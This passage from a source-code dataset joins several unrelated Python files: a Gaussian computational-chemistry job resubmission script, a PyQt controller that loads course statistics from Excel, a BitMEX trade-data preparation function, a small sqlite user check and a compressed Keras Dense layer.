carts.tolist() \"\"\"\n np.savetxt(\"tmp.txt\", carts, fmt=\"%f\")\n\n clean_many_txt(geomDirName)\n\n\ndef freq_hf_zero(lines, filename):\n frequency = \"Frequencies --\"\n freqs = []\n HF = \"HF=\"\n HFs = []\n zero_point = \" Zero-point correction=\"\n zeros = []\n\n with open(filename) as search:\n for num, line in enumerate(search, 1):\n\n if frequency in line:\n freqs.append(line)\n\n if HF in line:\n start = 'HF='\n index = line.index(start)\n HFs.append(line[index:])\n\n if zero_point in line:\n zeros.append(line)\n print(\"hf\", HFs, 'freqs', freqs, 'zeros', zeros)\n if len(freqs) == 0 and len(zeros) == 0:\n freqs.append(\"0\")\n zeros.append(\" (Hartree/Particle)0\")\n if len(HFs) == 1:\n return freqs[0], HFs[0], 0, zeros[0]\n else:\n return freqs[0], HFs[0], HFs[1], zeros[0]\n\n\ndef find_geom(lines,\n error,\n filename,\n imaginary,\n geomDirName,\n xyzSmiles=True,\n numberedClean=True):\n found = False\n geom_size = 0\n geom_list = []\n with open(filename) as search:\n for num, line in enumerate(search, 1):\n if \" Charge = 0 Multiplicity = 1\" in line:\n geom_size = num + 1\n found = True\n elif found == True and num < geom_size + 200:\n geom_list.append(line)\n elif found == True and line == ' \\n':\n #geom_size = num - geom_size\n break\n clean_geom_size = []\n for i in geom_list:\n if not \" \\n\" == i:\n clean_geom_size.append(i)\n elif i == ' \\n':\n break\n geom_size = len(clean_geom_size)\n if error == True:\n pop_2 = \"Population analysis using the SCF Density.\"\n pops = []\n pop_2_test = False\n with open(filename) as search:\n for line in search:\n if pop_2 in line:\n pops.append(1)\n if len(pops) == 2:\n pop_2_test = True\n if pop_2_test == True:\n with open(filename) as search:\n for num, line in enumerate(search, 1):\n if geom_start in line:\n standards.append(num + 5)\n\n geom_end_pops = \" Rotational constants (GHZ):\"\n with open(filename) as search:\n for num, line in enumerate(search, 1):\n if geom_end_pops in line:\n orientation.append(num - 1)\n else:\n with open(filename) as search:\n for num, line in enumerate(search, 1):\n if geom_start in line:\n standards.append(num + 5)\n\n with open(filename) as search:\n for num, line in enumerate(search, 1):\n if geom_end in line:\n orientation.append(num - 2)\n else:\n\n with open(filename) as search:\n for num, line in enumerate(search, 1):\n if geom_start in line:\n standards.append(num + 5)\n\n with open(filename) as search:\n for num, line in enumerate(search, 1):\n if geom_end in line:\n orientation.append(num - 2)\n if len(orientation) < 6:\n orien = len(orientation)\n else:\n orien = 5\n if len(standards) < 6:\n stand = len(standards)\n else:\n stand = 5\n for i in range(-1, -orien, -1):\n for j in range(-1, -stand, -1):\n length = orientation[i] - standards[j]\n if length == geom_size:\n orien = i\n stand = j\n break\n if stand == 5:\n stand = -1\n del lines[standards[stand] - 1 + length:]\n del lines[:standards[stand] - 1]\n\n cleaned_lines = []\n for i in range(len(lines)):\n clean = cleanLine(lines[i])\n cleaned_lines.append(clean)\n\n start_array = np.array(cleaned_lines)\n new_geom = np.zeros(((int(len(start_array[:, 3]))), 4))\n new_geom[:, 0] = start_array[:, 1]\n new_geom[:, 1] = start_array[:, 3]\n new_geom[:, 2] = start_array[:, 4]\n new_geom[:, 3] = start_array[:, 5]\n\n out_file = \"tmp.txt\"\n np.savetxt(out_file, new_geom, fmt=\"%f\")\n\n if not imaginary:\n clean_many_txt(geomDirName, xyzSmiles, numberedClean)\n elif error:\n clean_many_txt(geomDirName, xyzSmiles, numberedClean)\n\n\ndef 
xyzToSmiles(length, xyz, geomDirName):\n with open('molecule.xyz', 'w') as fp:\n fp.write('%s\\ncharge=0=\\n' % length)\n for n, i in enumerate(xyz):\n if n == len(xyz) - 1:\n fp.write(i[:-2])\n else:\n fp.write(i)\n \"\"\"\n cmd = 'python3 ../../src/xyz2mol.py ./molecule.xyz'\n\n val = subprocess.check_output(cmd, shell=True).decode(\"utf-8\")\n\n os.remove('molecule.xyz')\n \"\"\"\n cmd = 'obabel -ixyz molecule.xyz -osmi -molecule.smi'\n err = subprocess.call(cmd, shell=True)\n with open('molecule.smi', 'r') as fp:\n val = fp.readlines()[0]\n val = val.split(\"charge\")\n val = val[0].rstrip()\n\n mol = Molecule()\n if os.path.exists('info.json'):\n mol.setData('info.json')\n mol.setGeneralSMILES(val.rstrip())\n mol.sendToFile('info.json')\n mol_lst = MoleculeList()\n mol_lst.setData(\"../../results.json\")\n mol_lst.updateMolecule(mol)\n mol_lst.sendToFile('../../results.json')\n else:\n\n mol.setLocalName(geomDirName)\n mol.setGeneralSMILES(val.rstrip())\n mol.sendToFile('info.json')\n\n\ndef make_input_files_no_constraints(output_num, method_opt, basis_set_opt,\n mem_com_opt, mem_pbs_opt, cluster):\n \"\"\" Combines the geometry output and the constrained output. Then makes the .com and .pbs files in a subdirectory \"\"\"\n data = \"\"\n with open('tmp.txt') as fp:\n data = fp.read()\n charges = \"0 1\"\n\n if cluster == \"map\":\n with open('mex.com', 'w') as fp:\n fp.write(\"%mem={0}mb\\n\".format(mem_com_opt))\n fp.write(\"%nprocs=4\\n\")\n fp.write(\"#N {0}\".format(method_opt) +\n \"/{0} OPT\\n\".format(basis_set_opt))\n fp.write(\"\\n\")\n fp.write(\n \"Name ModRedundant - Minimalist working constrained optimisation\\n\"\n )\n fp.write(\"\\n\")\n fp.write(charges + \"\\n\")\n fp.write(data)\n fp.write(\"\\n\")\n\n with open('mex.pbs', 'w') as fp:\n fp.write(\"#!/bin/sh\\n\")\n fp.write(\n \"#PBS -N mex_o\\n#PBS -S /bin/bash\\n#PBS -j oe\\n#PBS -m abe\\n#PBS -l\"\n )\n fp.write(\"mem={0}gb\\n\".format(mem_pbs_opt))\n fp.write(\n \"#PBS -l nodes=1:ppn=4\\n#PBS -q gpu\\n\\nscrdir=/tmp/$USER.$PBS_JOBID\\n\\n\"\n )\n fp.write(\n \"mkdir -p $scrdir\\nexport GAUSS_SCRDIR=$scrdir\\nexport OMP_NUM_THREADS=1\\n\\n\"\n )\n fp.write(\n \"\"\"echo \"exec_host = $HOSTNAME\"\\n\\nif [[ $HOSTNAME =~ cn([0-9]{3}) ]];\\n\"\"\"\n )\n fp.write(\"then\\n\")\n fp.write(\n \" nodenum=${BASH_REMATCH[1]};\\n nodenum=$((10#$nodenum));\\n echo $nodenum\\n\\n\"\n )\n fp.write(\n \"\"\" if (( $nodenum <= 29 ))\\n then\\n echo \"Using AVX version\";\\n\"\"\"\n )\n fp.write(\n \" export g16root=/usr/local/apps/gaussian/g16-b01-avx/\\n elif (( $nodenum > 29 ))\\n\"\n )\n fp.write(\n \"\"\" then\\n echo \"Using AVX2 version\";\\n export g16root=/usr/local/apps/gaussian/g16-b01-avx2/\\n else\\n\"\"\"\n )\n fp.write(\n \"\"\" echo \"Unexpected condition!\"\\n exit 1;\\n fi\\nelse\\n\"\"\"\n )\n fp.write(\"\"\" echo \"Not on a compute node!\"\\n exit 1;\\nfi\\n\\n\"\"\")\n fp.write(\n \"cd $PBS_O_WORKDIR\\n. 
$g16root/g16/bsd/g16.profile\\ng16 mex.com mex.out\"\n + str(output_num) + \"\\n\\nrm -r $scrdir\\n\")\n elif cluster == 'seq':\n gaussianInputFiles(output_num,\n method_opt,\n basis_set_opt,\n mem_com_opt,\n mem_pbs_opt,\n cluster,\n baseName='./',\n procedure='OPT')\n\n qsub()\n\n\ndef qsub(path='.'):\n resetDirNum = len(path.split(\"/\"))\n if path != '.':\n os.chdir(path)\n pbs_file = glob.glob(\"*.pbs\")[0]\n cmd = 'qsub %s' % pbs_file\n print(os.getcwd(), \"cmd\", cmd)\n failure = subprocess.call(cmd, shell=True)\n if path != '.':\n for i in range(resetDirNum):\n os.chdir(\"..\")\n\n\ndef make_exc_mo_freq(method_mexc, basis_set_mexc, mem_com_mexc, mem_pbs_mexc,\n cluster, geomDirName):\n\n #baseName = 'cam-b3lyp'\n if method_mexc == 'CAM-B3LYP':\n baseName = 'mexc'\n dir_name = 'mexc'\n else:\n baseName = 'mexc'\n dir_name = method_mexc.lower()\n if os.path.exists(dir_name):\n print('\\n%s directory already exists\\n' % (dir_name))\n return\n os.mkdir(dir_name)\n procedure = 'TD(NStates=10)'\n output_num = 0\n #basis_set_mexc='CAM-B3LYP'\n\n #solvent = 'SCRF=(Solvent=Dichloromethane)'\n solvent = ''\n outName = geomDirName\n gaussianInputFiles(output_num,\n method_mexc,\n basis_set_mexc,\n mem_com_mexc,\n mem_pbs_mexc,\n cluster,\n baseName=baseName,\n procedure=procedure,\n data='',\n dir_name=dir_name,\n solvent='',\n outName=outName)\n path = '%s' % dir_name\n qsub(path)\n \"\"\"\n gaussianInputFiles(output_num, method_opt,\n basis_set_opt, mem_com_opt,\n mem_pbs_opt, cluster,\n baseName='mexc', procedure='OPT',\n data='', dir_name='', solvent='',\n outName='mexc_o'\n ):\n \"\"\"\n \"\"\"\n baseName = 'mexc'\n os.mkdir(baseName)\n procedure = 'TD(NStates=10)'\n output_num = 0\n gaussianInputFiles(output_num, method_mexc,\n basis_set_mexc, mem_com_mexc,\n mem_pbs_mexc, cluster,\n baseName, procedure\n )\n path = '%s' % baseName\n qsub(path)\n \"\"\"\n \"\"\"\n baseName = 'mo'\n os.mkdir(baseName)\n procedure = 'SP GFINPUT POP=FULL'\n output_num = 0\n gaussianInputFiles(output_num, method_mexc,\n basis_set_mexc, mem_com_mexc,\n mem_pbs_mexc, cluster,\n baseName, procedure\n )\n path = '%s' % baseName\n qsub(path)\n \"\"\"\n \"\"\"\n baseName = 'freq'\n os.mkdir(baseName)\n procedure = 'FREQ'\n output_num = 0\n gaussianInputFiles(output_num, method_mexc,\n basis_set_mexc, mem_com_mexc,\n mem_pbs_mexc, cluster,\n baseName, procedure\n )\n path = '%s' % baseName\n qsub(path)\n \"\"\"\n\n\ndef clean_energies(hf_1, hf_2, zero_point):\n zero_point = zero_point[30:].replace(\" (Hartree/Particle)\", \"\")\n for i in range(10):\n zero_point = zero_point.replace(\" \", \" \")\n zero_point = float(zero_point)\n hf_1 = (hf_1[3:].replace(\"\\n\", \"\").split('\\\\'))\n\n if hf_2 != 0:\n hf_2 = (hf_2[3:].replace(\"\\n\", \"\").split('\\\\'))\n\n if hf_1[0] > hf_2[0]:\n return float(hf_1[0]) + zero_point\n else:\n return float(hf_2[0]) + zero_point\n else:\n return float(hf_1[0]) + zero_point\n\n\nword_error = \"Error\"\ngeom_start = \"Standard orientation:\"\n\ngeom_end = \" Standard basis:\"\nstandards = []\norientation = []\n\n\ndef main(index,\n method_opt,\n basis_set_opt,\n mem_com_opt,\n mem_pbs_opt,\n method_mexc,\n basis_set_mexc,\n mem_com_mexc,\n mem_pbs_mexc,\n resubmissions,\n delay,\n cluster,\n geomDirName,\n xyzSmiles=True):\n\n out_files = glob.glob(\"*.out*\")\n out_completion = glob.glob(\"mex_o.*\")\n if len(out_files) > 0:\n\n filename = out_files[-1]\n\n output_num = list(filename)\n output_num = output_num[-1]\n\n if output_num == \"t\":\n output_num = 2\n\n else:\n 
output_num = int(output_num[-1]) + 1\n if delay == 0:\n resubmissions[index] = output_num\n if len(out_completion) != len(out_files):\n return True, resubmissions\n if resubmissions[index] > output_num:\n return True, resubmissions\n\n f = open(filename, 'r')\n lines = f.readlines()\n f.close()\n\n error = False\n\n imaginary, freq_clean, freq_lst_len = i_freq_check(filename)\n\n with open(filename) as search:\n for num, line in enumerate(search, 1):\n if word_error in line:\n error = True\n cmd = \"qsub mex.pbs\"\n if error == True:\n print(\"ERROR == TRUE\")\n find_geom(lines,\n error=True,\n filename=filename,\n imaginary=imaginary,\n geomDirName=geomDirName)\n make_input_files_no_constraints(output_num, method_opt,\n basis_set_opt, mem_com_opt,\n mem_pbs_opt, cluster)\n #os.system(\"qsub mex.pbs\")\n failure = subprocess.call(cmd, shell=True)\n resubmissions[index] += 1\n return False, resubmissions\n\n elif imaginary == True:\n find_geom(lines,\n error=False,\n filename=filename,\n imaginary=imaginary,\n geomDirName=geomDirName)\n add_imaginary(freq_clean,\n freq_lst_len,\n filename,\n geomDirName=geomDirName)\n\n make_input_files_no_constraints(output_num, method_opt,\n basis_set_opt, mem_com_opt,\n mem_pbs_opt, cluster)\n os.system(\"qsub mex.pbs\")\n failure = subprocess.call(cmd, shell=True)\n print('imaginary frequency handling...')\n resubmissions[index] += 1\n return False, resubmissions\n else:\n print(\"ELSE\")\n cmd = \"qsub mexc.pbs\"\n find_geom(lines,\n error=False,\n filename=filename,\n imaginary=imaginary,\n geomDirName=geomDirName,\n xyzSmiles=xyzSmiles)\n '''\n freq, hf_1, hf_2, zero_point = freq_hf_zero(\n lines, filename=filename)\n '''\n print(\"entering make_exc_mo_freq\")\n make_exc_mo_freq(method_mexc, basis_set_mexc, mem_com_mexc,\n mem_pbs_mexc, cluster, geomDirName)\n\n os.remove(\"tmp.txt\")\n\n return False, resubmissions\n print('Calculation still running')\n return True, resubmissions\n else:\n print('No output files detected for geom%d' % (index + 1))\n return True, resubmissions\n\n\n# main()\n","repo_name":"Awallace3/Dyes","sub_path":"src/error_mexc_dyes_v1.py","file_name":"error_mexc_dyes_v1.py","file_ext":"py","file_size_in_byte":26014,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"16592003320","text":"from PyQt5 import QtWidgets\nimport pandas as pd\nimport math\nimport re\nimport sys\n\nfrom Vistas.VistaLecturaPlanilla import VistaLecturaPlanilla\nfrom Modelos.EstadisticaAsignatura import EstadisticaAsignatura\n\nclass ControladorLecturaPlanilla():\n\n def __init__(self, controladorPrincipal, databaseContext, GUI):\n self.GUI = GUI\n self.databaseContext = databaseContext\n self.controladorPrincipal = controladorPrincipal\n self.vistaLecturaPlanilla = VistaLecturaPlanilla(self)\n self.asignaturasRegistradas = self.databaseContext.obtenerAsignaturas()\n if self.asignaturasRegistradas == None:\n self.vistaLecturaPlanilla.mostrarAlerta(\"Error\", \"Error en la conexión a la base de datos, el programa terminará su ejecución inmediatamente.\")\n sys.exit()\n self.mostrarVistaLecturaPlanilla()\n \n def iniciarIngresoPlanilla(self):\n ano = self.vistaLecturaPlanilla.getAno()\n semestre = self.vistaLecturaPlanilla.getSemestre()\n nombreArchivo = self.vistaLecturaPlanilla.getNombreArchivo()\n parametrosValidos = self.validarParametrosIngresoPlanilla(ano, semestre, nombreArchivo)\n if not parametrosValidos:\n return\n self.ano = int(ano)\n self.semestre = semestre\n self.datosExistentesPeriodo 
= self.databaseContext.obtenerEstadisticasPeriodo(ano, semestre)\n ingresoExitoso = self.leerDatosPlanilla(nombreArchivo)\n if ingresoExitoso:\n self.vistaLecturaPlanilla.mostrarAlerta(\"Ingreso exitoso\",\"Se ha ingresado correctamente la información de planificación docente del periodo indicado.\")\n self.volverContextoPrincipal()\n\n def validarParametrosIngresoPlanilla(self, ano, semestre, nombreArchivo):\n if not self.anoValido(ano):\n self.vistaLecturaPlanilla.setErrorAno(\"El valor ingresado es invalido, año debe ser un valor numérico.\\n(Periodos admitidos corresponden al intervalo 2015-2050).\")\n return False\n self.vistaLecturaPlanilla.setErrorAno(\"\")\n if not self.semestreValido(semestre):\n self.vistaLecturaPlanilla.setErrorPeriodo(\"Debe seleccionar un periodo lectivo.\")\n return False\n self.vistaLecturaPlanilla.setErrorPeriodo(\"\")\n if not self.nombreArchivoValido(nombreArchivo):\n self.vistaLecturaPlanilla.setErrorNombreArchivo(\"Debe seleccionar un archivo.\")\n return False\n self.vistaLecturaPlanilla.setErrorNombreArchivo(\"\")\n return True\n\n def leerDatosPlanilla(self, nombreArchivo):\n tipo = self.identificarTipoPlanilla(nombreArchivo)\n estadisticasArchivo = None\n if not (tipo == 1 or tipo == 2):\n self.vistaLecturaPlanilla.mostrarAlerta(\"Error\",\"El archivo ingresado no cumple con el formato esperado.\")\n return False\n if tipo == 1:\n estadisticasArchivo = self.leerPlanillaTipo1(nombreArchivo)\n estadisticasComplementadas = self.complementarEstadisticasArchivo(estadisticasArchivo)\n self.databaseContext.ingresarEstadisticasAsignaturas(self.ano, self.semestre, estadisticasComplementadas)\n return True\n elif tipo == 2:\n estadisticasArchivo = self.leerPlanillaTipo2(nombreArchivo)\n estadisticasComplementadas = self.complementarEstadisticasArchivo(estadisticasArchivo)\n self.databaseContext.ingresarEstadisticasAsignaturas(self.ano, self.semestre, estadisticasComplementadas)\n return True\n \n def complementarEstadisticasArchivo(self, estadisticasArchivo):\n for codigo in estadisticasArchivo:\n if codigo in self.datosExistentesPeriodo:\n estadisticaExistente = EstadisticaAsignatura(self.ano, self.semestre, codigo)\n estadisticaExistente.setInscritosTeoria(self.datosExistentesPeriodo[codigo][\"inscritosTeoria\"])\n estadisticaExistente.setAprobadosTeoria(self.datosExistentesPeriodo[codigo][\"aprobadosTeoria\"])\n estadisticaExistente.setReprobadosTeoria(self.datosExistentesPeriodo[codigo][\"reprobadosTeoria\"])\n estadisticaExistente.setInscritosLaboratorio(self.datosExistentesPeriodo[codigo][\"inscritosLaboratorio\"])\n estadisticaExistente.setAprobadosLaboratorio(self.datosExistentesPeriodo[codigo][\"aprobadosLaboratorio\"])\n estadisticaExistente.setReprobadosLaboratorio(self.datosExistentesPeriodo[codigo][\"reprobadosLaboratorio\"])\n estadisticaExistente.setTasaAprobacionTeoria(self.datosExistentesPeriodo[codigo][\"tasaAprobacionTeoria\"])\n estadisticaExistente.setTasaAprobacionLaboratorio(self.datosExistentesPeriodo[codigo][\"tasaAprobacionLaboratorio\"])\n estadisticaExistente.setTasaDesinscripcion(self.datosExistentesPeriodo[codigo][\"tasaDesinscripcion\"])\n estadisticaComplementada = self.complementarEstadisticas(estadisticaExistente, estadisticasArchivo[codigo])\n estadisticasArchivo[codigo] = estadisticaComplementada\n return estadisticasArchivo\n\n def complementarEstadisticas(self, estadisticaExistente, estadisticaNueva): \n if estadisticaExistente.inscritosTeoria == 0:\n estadisticaExistente.inscritosTeoria = 
estadisticaNueva.inscritosTeoria\n if estadisticaExistente.aprobadosTeoria == 0:\n estadisticaExistente.aprobadosTeoria = estadisticaNueva.aprobadosTeoria\n if estadisticaExistente.reprobadosTeoria == 0:\n estadisticaExistente.reprobadosTeoria = estadisticaNueva.reprobadosTeoria\n if estadisticaExistente.inscritosLaboratorio == 0:\n estadisticaExistente.inscritosLaboratorio = estadisticaNueva.inscritosLaboratorio\n if estadisticaExistente.aprobadosLaboratorio == 0:\n estadisticaExistente.aprobadosLaboratorio = estadisticaNueva.aprobadosLaboratorio\n if estadisticaExistente.reprobadosLaboratorio == 0:\n estadisticaExistente.reprobadosLaboratorio = estadisticaNueva.reprobadosLaboratorio\n estadisticaExistente.calcularTasas()\n return estadisticaExistente\n\n def mostrarVistaLecturaPlanilla(self):\n self.GUI.addWidget(self.vistaLecturaPlanilla)\n self.GUI.setCurrentIndex(self.GUI.currentIndex()+1)\n\n def volverContextoPrincipal(self):\n self.controladorPrincipal.mostrarVistaPrincipal()\n \n def anoValido(self,ano):\n if not ano.isnumeric():\n return False\n ano = int(ano)\n if ano >= 2015 and ano <= 2050:\n return True\n\n def semestreValido(self, semestre):\n if semestre == 1 or semestre == 2:\n return True\n \n def nombreArchivoValido(self, nombreArchivo):\n if nombreArchivo == \"\":\n return False\n return True\n\n def identificarTipoPlanilla(self, nombreArchivo):\n try:\n data = pd.read_excel(nombreArchivo,skiprows=2)\n columns = data.columns.values.tolist()\n if 'Código Ejecución' in columns and 'Código Civil' in columns and 'COORD.' in columns and 'INSCRITOS' in columns and 'APROBADOS' in columns and 'REPROBADOS' in columns:\n return 2\n elif 'Código Ejecución' in columns and 'Código Civil' in columns and 'COORD.' in columns and 'INSCRITOS' in columns:\n return 1\n except:\n return 0\n\n def leerPlanillaTipo1(self, nombreArchivo):\n data = pd.read_excel(nombreArchivo,usecols=\"A,B,D,S\",skiprows=2)\n data = data.T\n estadisticas = {}\n cantidadFilas = data.shape[1]\n for i in range(cantidadFilas):\n fila = data.iloc[:, i]\n codigoEjecucionValido, codigoEjecucion= self.validarCodigo(fila[\"Código Ejecución\"])\n codigoCivilValido, codigoCivil= self.validarCodigo(fila[\"Código Civil\"])\n coordinacion = fila[\"COORD.\"]\n inscritos = fila[\"INSCRITOS\"]\n if codigoEjecucionValido:\n estadisticas = self.agregarInscritosEstadisticas(estadisticas, codigoEjecucion, coordinacion, inscritos)\n elif codigoCivilValido:\n estadisticas = self.agregarInscritosEstadisticas(estadisticas, codigoCivil, coordinacion, inscritos)\n for codigo in estadisticas:\n estadisticas[codigo].calcularTasas()\n return estadisticas\n\n def leerPlanillaTipo2(self, nombreArchivo):\n data = pd.read_excel(nombreArchivo,usecols=\"A,B,D,S,AB,AC\",skiprows=2)\n data = data.T\n estadisticas = {}\n cantidadFilas = data.shape[1]\n for i in range(cantidadFilas):\n fila = data.iloc[:, i]\n codigoEjecucionValido, codigoEjecucion= self.validarCodigo(fila[\"Código Ejecución\"])\n codigoCivilValido, codigoCivil= self.validarCodigo(fila[\"Código Civil\"])\n coordinacion = fila[\"COORD.\"]\n inscritos = fila[\"INSCRITOS\"]\n aprobados = fila[\"APROBADOS\"]\n reprobados = fila[\"REPROBADOS\"]\n if codigoEjecucionValido:\n estadisticas = self.agregarInscritosEstadisticas(estadisticas, codigoEjecucion, coordinacion, inscritos)\n estadisticas = self.agregarAprobadosEstadisticas(estadisticas, codigoEjecucion, coordinacion, aprobados)\n estadisticas = self.agregarReprobadosEstadisticas(estadisticas, codigoEjecucion, coordinacion, 
reprobados)\n elif codigoCivilValido:\n estadisticas = self.agregarInscritosEstadisticas(estadisticas, codigoCivil, coordinacion, inscritos)\n estadisticas = self.agregarAprobadosEstadisticas(estadisticas, codigoCivil, coordinacion, aprobados)\n estadisticas = self.agregarReprobadosEstadisticas(estadisticas, codigoCivil, coordinacion, reprobados)\n for codigo in estadisticas:\n estadisticas[codigo].calcularTasas()\n return estadisticas\n\n def validarCodigo(self, codigo):\n\n valor = 0\n if isinstance(codigo,int):\n valor = codigo\n elif isinstance(codigo,str):\n valores = re.split(' |/', codigo)\n i = 0\n while i < len(valores):\n if valores[i].isnumeric():\n i = i+1\n else:\n del valores[i]\n if len(valores)>= 1:\n valor = int(valores[0])\n if valor in self.asignaturasRegistradas:\n return True,valor\n else:\n return False,valor\n\n def agregarInscritosEstadisticas(self, estadisticas, codigo ,coordinacion, inscritos):\n if codigo in estadisticas:\n estadisticas[codigo].agregarInscritos(coordinacion, inscritos)\n return estadisticas\n nuevaAsignatura = EstadisticaAsignatura(self.ano, self.semestre, codigo)\n nuevaAsignatura.agregarInscritos(coordinacion, inscritos)\n estadisticas[codigo] = nuevaAsignatura\n return estadisticas\n\n def agregarAprobadosEstadisticas(self, estadisticas, codigo, coordinacion, aprobados):\n if codigo in estadisticas:\n estadisticas[codigo].agregarAprobados(coordinacion, aprobados)\n return estadisticas\n nuevaAsignatura = EstadisticaAsignatura(self.ano, self.semestre, codigo)\n nuevaAsignatura.agregarAprobados(coordinacion, aprobados)\n estadisticas[codigo] = nuevaAsignatura\n return estadisticas\n\n def agregarReprobadosEstadisticas(self, estadisticas, codigo, coordinacion, reprobados):\n if codigo in estadisticas:\n estadisticas[codigo].agregarReprobados(coordinacion, reprobados)\n return estadisticas\n nuevaAsignatura = EstadisticaAsignatura(self.ano, self.semestre, codigo)\n nuevaAsignatura.agregarReprobados(coordinacion, reprobados)\n estadisticas[codigo] = nuevaAsignatura\n return estadisticas","repo_name":"nvierass/Proyecto-ECCA","sub_path":"Controladores/ControladorLecturaPlanilla.py","file_name":"ControladorLecturaPlanilla.py","file_ext":"py","file_size_in_byte":11880,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73838515524","text":"from datetime import timezone\n\nimport numpy as np\nimport pandas as pd\n\n\ndef prepare_s3(date, data_frame, strip_nanoseconds=True):\n timestamp_format = \"%Y-%m-%dD%H:%M:%S.%f\"\n data_frame[\"timestamp\"] = pd.to_datetime(\n data_frame[\"timestamp\"], format=timestamp_format\n )\n # Because pyarrow.lib.ArrowInvalid: Casting from timestamp[ns]\n # to timestamp[us, tz=UTC] would lose data.\n data_frame[\"timestamp\"] = data_frame.apply(\n lambda x: x.timestamp.tz_localize(timezone.utc), axis=1\n )\n # Bitmex data is accurate to the nanosecond.\n # However, data is typically only provided to the microsecond.\n data_frame[\"nanoseconds\"] = data_frame.apply(\n lambda x: x.timestamp.nanosecond, axis=1\n )\n with_nanoseconds = data_frame[data_frame[\"nanoseconds\"] > 0]\n # On 2017-09-08 there is one timestamp with nanoseconds.\n # If kwarg self.string_nanoeconds, then strip.\n total = len(with_nanoseconds)\n if total:\n date_string = date.isoformat()\n rows = \"row\" if total == 1 else \"rows\"\n print(f\"Unsupported nanoseconds: {total} {rows} on {date_string}\")\n if strip_nanoseconds:\n data_frame[\"timestamp\"] = data_frame.apply(\n lambda x: 
x.timestamp.replace(nanosecond=0)\n if x.nanoseconds > 0\n else x.timestamp,\n axis=1,\n )\n data_frame[\"nanoseconds\"] = data_frame.apply(\n lambda x: x.timestamp.nanosecond, axis=1\n )\n with_nanoseconds = data_frame[data_frame[\"nanoseconds\"] > 0]\n assert len(with_nanoseconds) == 0\n data_frame.insert(0, \"date\", data_frame[\"timestamp\"].dt.date)\n data_frame = data_frame.rename(columns={\"size\": \"volume\"})\n data_frame[\"tickRule\"] = data_frame.apply(\n lambda x: (1 if x.tickDirection in (\"PlusTick\", \"ZeroPlusTick\") else -1),\n axis=1,\n )\n symbols = data_frame[\"symbol\"].unique()\n data_frame[\"index\"] = np.nan\n for symbol in symbols:\n index = data_frame.index[data_frame[\"symbol\"] == symbol]\n # 0-based index according to symbol.\n data_frame.loc[index, \"index\"] = index.values - index.values[0]\n data_frame = data_frame.astype(\n {\"price\": \"float64\", \"volume\": \"int64\", \"index\": \"int64\"}\n )\n data_frame[\"sequence\"] = 0\n return data_frame\n","repo_name":"maestro73/bitmex-historical-etl","sub_path":"bitmex_historical_etl/transforms/prepare_s3.py","file_name":"prepare_s3.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"15110378288","text":"# Функция проверки доступа Usera к данным\ndef verificate_User(x):\n status_Verif = False\n con = None\n con = sqlite3.connect('c:/projects/ultrabot/db_current_user.db')\n cursor = con.cursor()\n cursor.execute(\"SELECT * FROM Users\")\n results = cursor.fetchall()\n for user_info in results:\n if str(x) == str(user_info[6]):\n status_Verif = True\n con.close()\n\n\n# def current_User_Autorize():\n\n# update.message.reply_text(\n# f'Привет {update.message.chat.id}, Я бот \\n' +\n# f'я умею выполнять команды:')\n# for arr_to_str in bigdata.bot_set_config:\n# update.message.reply_text(\n# f'{arr_to_str} - {bigdata.bot_set_config[arr_to_str]}')\n","repo_name":"innerhard/telegram_bot_python","sub_path":"db_connector.py","file_name":"db_connector.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31647325442","text":"from absl import logging\nimport tensorflow as tf\n\n\nclass CompressedDense(tf.keras.layers.Dense):\n \"\"\"A compressed Dense keras layer with the compression op.\n\n The compression_obj.get_spec().rank must be divisibe by\n compression_obj.get_spec().input_block_size. The input size to the layer\n must be divisible by compression_obj.get_spec().input_block_size which\n in turn must be divisible by compression_obj.get_spec().rank.\n \"\"\"\n\n def __init__(self,\n units,\n activation=None,\n use_bias=True,\n kernel_initializer='glorot_uniform',\n bias_initializer='zeros',\n kernel_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n kernel_constraint=None,\n bias_constraint=None,\n compression_obj=None,\n **kwargs):\n \"\"\"Initializer.\n\n Args:\n units: Positive integer, dimensionality of the output space.\n activation: Activation function to use. If you don't specify anything, no\n activation is applied\n (ie. 
\"linear\" activation: `a(x) = x`).\n use_bias: Boolean, whether the layer uses a bias vector.\n kernel_initializer: Initializer for the `kernel` weights matrix.\n bias_initializer: Initializer for the bias vector.\n kernel_regularizer: Regularizer function applied to the `kernel` weights\n matrix.\n bias_regularizer: Regularizer function applied to the bias vector.\n activity_regularizer: Regularizer function applied to the output of the\n layer (its \"activation\").\n kernel_constraint: Constraint function applied to the `kernel` weights\n matrix.\n bias_constraint: Constraint function applied to the bias vector.\n compression_obj: Compression object contaning compression parameters The\n compression_obj.get_spec().rank must be divisibe by\n compression_obj.get_spec().input_block_size. The input size to the layer\n must be divisible by compression_obj.get_spec().input_block_size which\n in turn must be divisible by compression_obj.get_spec().rank.\n **kwargs: additional keyword arguments.\n \"\"\"\n\n super().__init__(units, activation, use_bias, kernel_initializer,\n bias_initializer, kernel_regularizer, bias_regularizer,\n activity_regularizer, kernel_constraint, bias_constraint,\n **kwargs)\n self.compression_obj = compression_obj\n self.compression_op = None\n self.alpha = -1\n\n def build(self, input_shape):\n super().build(input_shape)\n self.compression_op = self.compression_obj.apply_compression_keras(\n self.kernel, layer=self)\n\n logging.info(\n 'in build kernel a_matrix b_matrix and c_matrix shape is %s %s %s %s',\n self.kernel.shape, self.compression_op.a_matrix_tfvar.shape,\n self.compression_op.b_matrix_tfvar.shape,\n self.compression_op.c_matrix_tfvar.shape)\n\n def call(self, inputs, training=None):\n if training is None:\n training = tf.keras.backend.learning_phase()\n if training:\n self.compression_op.maybe_run_update_step()\n return self.activation(\n self.compression_op.compressed_matmul_keras(inputs, training=training) +\n self.bias)\n","repo_name":"google-research/google-research","sub_path":"non_semantic_speech_benchmark/distillation/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":31433,"dataset":"github-code","pt":"99"} +{"seq_id":"11732055641","text":"#!/usr/bin/env python3\n\n# IMPORTS\n# system\nimport os, sys, argparse, time\nimport pdb\n# math\nimport numpy as np\nimport cv2\n# 